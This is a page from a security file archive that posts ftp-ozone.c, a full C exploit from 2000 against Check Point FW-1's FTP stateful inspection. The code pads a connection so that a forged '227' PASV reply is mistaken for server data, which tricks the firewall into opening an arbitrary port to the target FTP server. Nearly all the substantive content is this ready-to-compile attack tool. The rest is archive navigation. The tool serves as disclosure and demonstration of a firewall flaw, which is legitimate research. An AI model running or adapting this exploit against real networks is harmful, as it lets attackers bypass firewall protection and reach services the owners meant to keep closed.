what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ftp-ozone.c.txt

ftp-ozone.c.txt
Posted Feb 22, 2000
Authored by Dug Song | Site monkey.org

Exploit for recent FW-1 FTP problems - Demonstrate a basic layer violation in "stateful" firewall inspection of application data (ftp within IP packets). Checkpoint alert about this vulnerability here.

tags | exploit
SHA-256 | 105b9db1985030576cb537ea4954c1985eb1a0c41554c114e8d7e40766964ac2

ftp-ozone.c.txt

Change Mirror Download
/*
ftp-ozone.c

Demonstrate a basic layer violation in "stateful" firewall
inspection of application data (within IP packets - @#$@#$!):

https://www.checkpoint.com/techsupport/alerts/pasvftp.html

Dug Song <dugsong@monkey.org>
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <setjmp.h>

#define PAD_LEN 128 /* XXX - anything on BSD, but Linux is weird */

#define GREEN "\033[0m\033[01m\033[32m"
#define OFF "\033[0m"

jmp_buf env_buf;

void
usage(void)
{
fprintf(stderr, "Usage: ftp-ozone [-w win] <ftp-server> <port-to-open>\n");
exit(1);
}

u_long
resolve_host(char *host)
{
u_long addr;
struct hostent *hp;

if (host == NULL) return (0);

if ((addr = inet_addr(host)) == -1) {
if ((hp = gethostbyname(host)) == NULL)
return (0);
memcpy((char *)&addr, hp->h_addr, sizeof(addr));
}
return (addr);
}

#define UC(b) (((int)b)&0xff)

int
ftp_pasv_reply(char *buf, int size, u_long ip, u_short port)
{
char *p, *q;

port = htons(port);
p = (char *)&ip;
q = (char *)&port;

return (snprintf(buf, size, "227 (%d,%d,%d,%d,%d,%d)\r\n",
UC(p[0]), UC(p[1]), UC(p[2]), UC(p[3]),
UC(q[0]), UC(q[1])));
}

void handle_timeout(int sig)
{
alarm(0);
longjmp(env_buf, 1);
}

void
read_server_loop(int fd, int timeout, int pretty)
{
char buf[2048];
int rlen;

if (!setjmp(env_buf)) {
signal(SIGALRM, handle_timeout);
alarm(timeout);
for (;;) {
if ((rlen = read(fd, buf, sizeof(buf))) == -1)
break;
if (pretty) {
buf[rlen] = '\0';
if (strncmp(buf, "227 ", 4) == 0)
printf("[" GREEN "%s" OFF "]\n", buf);
else printf("[%s]\n", buf);
}
else write(0, buf, rlen);
}
alarm(0);
}
}

int
main(int argc, char *argv[])
{
int c, fd, win, len;
u_long dst;
u_short dport;
struct sockaddr_in sin;
char buf[1024];

win = PAD_LEN;

while ((c = getopt(argc, argv, "w:h?")) != -1) {
switch (c) {
case 'w':
if ((win = atoi(optarg)) == 0)
usage();
break;
default:
usage();
}
}
argc -= optind;
argv += optind;

if (argc != 2)
usage();

if ((dst = resolve_host(argv[0])) == 0)
usage();

if ((dport = atoi(argv[1])) == 0)
usage();

/* Connect to FTP server. */
memset(&sin, 0, sizeof(sin));
sin.sin_addr.s_addr = dst;
sin.sin_family = AF_INET;
sin.sin_port = htons(21);

if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket");
exit(1);
}
if (setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &win, sizeof(win)) == -1) {
perror("setsockopt");
exit(1);
}
if (connect(fd, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
perror("connect");
exit(1);
}
read_server_loop(fd, 10, 0);

/* Send padding. */
len = win - 5; /* XXX - "500 '" */
memset(buf, '.', len);

if (write(fd, buf, len) != len) {
perror("write");
exit(1);
}
/* Send faked reply. */
len = ftp_pasv_reply(buf, sizeof(buf), dst, dport);

if (write(fd, buf, len) != len) {
perror("write");
exit(1);
}
read_server_loop(fd, 5, 1);

printf("[ now try connecting to %s %d ]\n", argv[0], dport);

for (;;) {
;
}
/* NOTREACHED */

exit(0);
}

/* w00w00. */
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close